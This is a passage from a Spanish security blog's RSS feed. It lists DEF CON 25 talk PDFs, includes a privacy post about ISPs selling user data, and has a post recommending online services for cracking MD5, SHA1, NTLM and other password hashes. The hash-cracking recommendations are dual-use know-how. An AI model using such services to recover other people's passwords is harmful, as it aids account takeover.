&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-chaosdata-Ghost-in-the-Droid-ParaSpectre.pdf" title="DEFCON-25-chaosdata-Ghost-in-the-Droid-ParaSpectre.pdf"&gt;DEFCON-25-chaosdata-Ghost-in-the-Droid-ParaSpectre.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;5.1 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-r00killah-and-securelyfitz-Secure-Tokin-and-Doobiekeys.pdf" title="DEFCON-25-r00killah-and-securelyfitz-Secure-Tokin-and-Doobiekeys.pdf"&gt;DEFCON-25-r00killah-and-securelyfitz-Secure-Tokin-and-Doobiekeys.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;3.2 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-skud-and-Sky-If-You-Give-A-Mouse-A-Microchip.pdf" title="DEFCON-25-skud-and-Sky-If-You-Give-A-Mouse-A-Microchip.pdf"&gt;DEFCON-25-skud-and-Sky-If-You-Give-A-Mouse-A-Microchip.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;5.8 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-spaceB0x-Exploiting-Continuous-Integration.pdf" title="DEFCON-25-spaceB0x-Exploiting-Continuous-Integration.pdf"&gt;DEFCON-25-spaceB0x-Exploiting-Continuous-Integration.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.0 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-zerosum0x0-alephnaught-Koadic-C3.pdf" title="DEFCON-25-zerosum0x0-alephnaught-Koadic-C3.pdf"&gt;DEFCON-25-zerosum0x0-alephnaught-Koadic-C3.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;1.9 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
Enjoy!&lt;br /&gt;
&lt;br /&gt;
[!] Salu2&lt;br /&gt;
[i] Zion3R&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg93C5xxIMLgy_81ZeBqcqok9qFh5ahFPz5pLSAXyykuCvdNv-cuf4zZuJlV6Nu9xG9dZixU6LghBp_vfi2ScjAMyikifXLjGP1QdHhfAgt0PJyNMabvE2fPgSkyaxL8mol_t7UU7vZ53ii/s72-c/DEFCON25.png" width="72"/></item><item><title>Privacidad y Anonimato en un Mundo de Datos ¿Imposible?</title><link>http://www.blackploit.com/2017/04/privacidad-y-anonimato-en-un-mundo-de.html</link><category>Anonimato</category><category>Privacidad</category><category>Seguridad</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Thu, 6 Apr 2017 20:50:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2205457787663225951</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPiiykQGx81HVKfue1yjEsTfz8dyWn6D3nqxkNIJUw3CROOzKgwZCxWauDEHR7dn17oAai7vkOsN44G1tw7CanMwiO-0g0O3V4sJjUfdkjkMe8ctoqVNGPYR2-r7VTfgl99-upMLYay5Ob/s1600/h15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="418" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPiiykQGx81HVKfue1yjEsTfz8dyWn6D3nqxkNIJUw3CROOzKgwZCxWauDEHR7dn17oAai7vkOsN44G1tw7CanMwiO-0g0O3V4sJjUfdkjkMe8ctoqVNGPYR2-r7VTfgl99-upMLYay5Ob/s640/h15.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Para un hacker es fácil realizar un ataque a través de una VPN, Proxy, TOR, servidor comprometido... Pero el resto del tiempo, como un ser humano normal ¿Tendrá el dinero para comprar una buena VPN?, ¿Tendrá la paciencia para dirigir su tráfico a través de TOR, esperar largos tiempos de espera y posibles bloqueos?&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En la mayoría de los países con una orden judicial las policías pueden pedir los datos de un cliente al ISP correspondiente, pero eso luego de un delito, una investigación y largo papeleo. Por lo cual existe una cierta "sensación" de seguridad y privacidad para el resto de los humanos, ya que no cometemos delitos, así que nadie nos va investigar ni ver nuestro historial de Internet...&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Pero el Congreso de Estados Unidos recientemente aprobó un proyecto de ley que permite a los proveedores de Internet (ISP) vender datos de sus usuarios, como los historiales de búsqueda o la localización. ¿Y por qué esto nos debe importar? Pues bueno, porqué todas nuestras comunicaciones pasan por USA &lt;strike&gt;(Por ejemplo, esta misma web está alojada allá)&lt;/strike&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Quiero que vean un vídeo de &lt;b&gt;Marta Peirano&lt;/b&gt; donde podemos ver las verdaderas consecuencias a las que se puede llegar si es que efectivamente se venden nuestros datos, el vídeo es sólo la punta del iceberg de lo que los ISP almacenan sobre nosotros y como pueden conocerte mejor que tu mismo...&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Quién te está vigilando&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;style&gt;.embed-container { position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden; max-width: 100%; } .embed-container iframe, .embed-container object, .embed-container embed { position: absolute; top: 0; left: 0; width: 100%; height: 100%; }&lt;/style&gt;&lt;br /&gt;
&lt;div class="embed-container"&gt;
&lt;iframe allowfullscreen="" frameborder="0" src="http://www.youtube.com/embed/y88LkxNntiY"&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;br /&gt;
Para los que les llamó la atención de la historia de &lt;b&gt;Malte Spitz&lt;/b&gt;, les dejo el link con la visualización de los datos que almacenan los proveedores de Internet:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;&lt;a href="http://www.zeit.de/datenschutz/malte-spitz-data-retention"&gt;http://www.zeit.de/datenschutz/malte-spitz-data-retention&lt;/a&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align:center"&gt;&lt;script type="text/javascript"&gt;
    google_ad_client = "ca-pub-7669852180477439";
    google_ad_slot = "4568540253";
    google_ad_width = 728;
    google_ad_height = 90;
&lt;/script&gt;
&lt;!-- 728 x 90 Blackploit --&gt;
&lt;script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;
&lt;br /&gt;
Duerman tranquilos...&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[°] Zion3R&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPiiykQGx81HVKfue1yjEsTfz8dyWn6D3nqxkNIJUw3CROOzKgwZCxWauDEHR7dn17oAai7vkOsN44G1tw7CanMwiO-0g0O3V4sJjUfdkjkMe8ctoqVNGPYR2-r7VTfgl99-upMLYay5Ob/s72-c/h15.png" width="72"/></item><item><title>Crack MD5, SHA1, MySQL, NTLM Free Online!</title><link>http://www.blackploit.com/2016/11/crack-md5-sha1-mysql-ntlm-free-online.html</link><category>Hack T00LZ</category><category>MD5 CRACK</category><category>MySQL</category><category>MySQL CRACK</category><category>NTLM CRACK</category><category>Seguridad Web</category><category>SHA1 CRACK</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Tue, 22 Nov 2016 12:12:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-8674567845353931435</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAFtF0S4E9wa-Sk0vW6yNaPsjYodOnehoM-34ewfabSmhzCvBV8ISY7TPxmOVRqb_stt9cmFUUvVo2pqYLzIBTkPYf0987vlASVl4kM41LLuN0Y25MAQM6rfQ05FrkBLFNKnXRC5pMCFOu/s1600/Crack_hash_online.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="496" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAFtF0S4E9wa-Sk0vW6yNaPsjYodOnehoM-34ewfabSmhzCvBV8ISY7TPxmOVRqb_stt9cmFUUvVo2pqYLzIBTkPYf0987vlASVl4kM41LLuN0Y25MAQM6rfQ05FrkBLFNKnXRC5pMCFOu/s640/Crack_hash_online.png" width="640" /&gt;&lt;/a&gt; &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
Hace algún tiempo salió &lt;b&gt;InsidePro Hash Finder&lt;/b&gt; un buscador de hashes másivo, gratuito y online donde se pueden encontrar hasta 25 mil hashes de una tanda. Detecta automáticamente el hash que buscas y encuentra la mayoría de las veces el password. Soporta más de 100 algoritmo, entre ellos: &lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;MD5&lt;/li&gt;
&lt;li&gt;SHA-1&lt;/li&gt;
&lt;li&gt;MySQL&lt;/li&gt;
&lt;li&gt;NTLM&lt;/li&gt;
&lt;li&gt;vbulliten&lt;/li&gt;
&lt;li&gt;oscommerce&lt;/li&gt;
&lt;li&gt;Invision Power Board&lt;/li&gt;
&lt;li&gt;Joomla&lt;/li&gt;
&lt;li&gt;MyBB&lt;/li&gt;
&lt;li&gt;SMF&lt;/li&gt;
&lt;li&gt;MaNGOS&lt;/li&gt;
&lt;li&gt;LM&lt;/li&gt;
&lt;li&gt;md4&lt;/li&gt;
&lt;li&gt;md5(md5_hex)&lt;/li&gt;
&lt;li&gt;md5-half&lt;/li&gt;
&lt;li&gt;sha224&lt;/li&gt;
&lt;li&gt;sha256&lt;/li&gt;
&lt;li&gt;sha384&lt;/li&gt;
&lt;li&gt;sha512&lt;/li&gt;
&lt;li&gt;ripeMD160&lt;/li&gt;
&lt;li&gt;whirlpool&lt;/li&gt;
&lt;li&gt;MySQL 4.1+ (sha1(sha1_bin))&lt;/li&gt;
&lt;li&gt;md5(md5($salt).md5($pass))&amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;etc...&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;a href="http://finder.insidepro.com/" rel="nofollow" target="_blank"&gt;&lt;span style="font-size: x-large;"&gt;&lt;b&gt;InsidePro Hash Finder&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"&gt;
&lt;/script&gt;
&lt;br /&gt;
Otras alternativas son:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://crackstation.net/"&gt;https://crackstation.net/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://md5db.net/decrypt"&gt;https://md5db.net/decrypt&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://hashkiller.co.uk/md5-decrypter.aspx"&gt;https://hashkiller.co.uk/md5-decrypter.aspx&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
Pero definitivamente me quedo con &lt;b&gt;InsidePro Hash Finder&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[*] Zion3R&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;decrypt, free hash cracker, free hash cracking, free hash database, free md5 decryptor, hash checker, hash cracker, hash cracking, hashcracking, hash cracking service, hash database, hash decrypter, hash finder, Invision Power Board, Joomla, LM, MaNGOS, md2, md4, MD5, md5 crack, md5 cracking, md5 decrypter, md5 decryption, md5 encrypter, md5 encryption, md5 encryptor, md5 hacking, md5 hash, md5 hash cracking, md5 hash database, md5 security, md5(md5_hex), md5-half, MyBB, MySQL, MySQL 4.1+ (sha1(sha1_bin)), NTLM, ntlm cracker, ntlm cracking, ntlm decrypter, ntlm decryption, ntlm hash, online hash cracking, online md5 cracker, oscommerce, pass salt, password cracking, password recovery, password recovery service, QubesV3.1BackupDefaults, ripeMD160, salt, salt pass, SHA-1, sha1, sha1 crack, sha1 cracker, sha1 cracking, sha1 decrypter, sha1 decryption, sha1 hash, sha224, sha256, sha384, sha512, SMF, vbulliten, whirlpool&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAFtF0S4E9wa-Sk0vW6yNaPsjYodOnehoM-34ewfabSmhzCvBV8ISY7TPxmOVRqb_stt9cmFUUvVo2pqYLzIBTkPYf0987vlASVl4kM41LLuN0Y25MAQM6rfQ05FrkBLFNKnXRC5pMCFOu/s72-c/Crack_hash_online.png" width="72"/></item></channel></rss>